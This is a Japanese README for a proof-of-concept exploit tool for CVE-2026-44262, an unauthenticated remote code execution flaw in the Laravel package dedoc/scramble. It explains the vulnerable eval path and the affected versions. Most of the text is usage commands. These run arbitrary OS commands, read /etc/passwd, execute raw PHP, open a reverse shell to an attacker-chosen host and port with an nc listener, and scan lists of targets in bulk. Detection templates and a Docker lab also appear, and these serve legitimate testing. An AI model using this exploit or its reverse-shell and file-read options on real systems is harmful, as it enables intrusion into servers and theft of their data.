
dedoc/scrambleにおける未認証RCE — PoC、Nmap NSE、Nucleiテンプレート。
CVE-2026-44262 は、Laravel の API ドキュメント生成ツールである dedoc/scramble における、認証不要のリモートコード実行の脆弱性です。
NodeRulesEvaluator::doEvaluateExpression() は、eval("return $code;"); の実行前に extract($variables) を呼び出します。コントローラが $request->input() を $code という名前の変数に代入し、それをバリデーションルールとして使用する場合、Scramble はその変数を追跡して eval スコープに渡します。攻撃者は、細工したクエリパラメータを /docs/api.json に送信することで、$code を任意の PHP で上書きできます。
影響を受けるバージョン: dedoc/scramble >=0.13.2, <0.13.22
sleep() を使用した安全で影響のないチェックで、eval が実行されることを確認しますproc_open によるリバースシェル。bash や busybox は不要ですhttp-scramble-rce-detect.nse)CVE-2026-44262.yaml)外部依存関係なし — Python 標準ライブラリのみを使用します。
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--docs-path PATH]
[--check] [--command CMD] [--code PHP] [--read-file PATH]
[--shell] [--lhost HOST] [--lport PORT] [--os OS]
[--useragent USERAGENT] [--timeout SECONDS]
# 完全な検出(タイミング + 実行プローブ)
python3 CVE-2026-44262.py --target http://example.com/docs/api
# 安全なチェックのみ — タイミングプローブのみ、コマンド実行なし
python3 CVE-2026-44262.py --target http://example.com/docs/api --check
# JSON エンドポイントパスを上書き
python3 CVE-2026-44262.py --target http://example.com/docs/api --docs-path /api/openapi.json
# 一括スキャン
python3 CVE-2026-44262.py --targets targets.txt
# コマンドを実行
python3 CVE-2026-44262.py --target http://example.com/docs/api --command "whoami"
# ファイルを読み取る
python3 CVE-2026-44262.py --target http://example.com/docs/api --read-file /etc/passwd
# 生の PHP を実行
python3 CVE-2026-44262.py --target http://example.com/docs/api --code "echo php_uname();"
# リバースシェル(開始: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com/docs/api --shell --lhost 172.17.0.1 --lport 4444
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com
# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com
脆弱なアプリ(dedoc/scramble v0.13.21)を含む自己完結型の Docker 環境が同梱されています。 詳細は docker/DOCKER.md を参照してください。
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000/docs/api
このツールは教育および研究目的でのみ提供されています。作成者は、このツールの誤用または損害について一切の責任を負いません。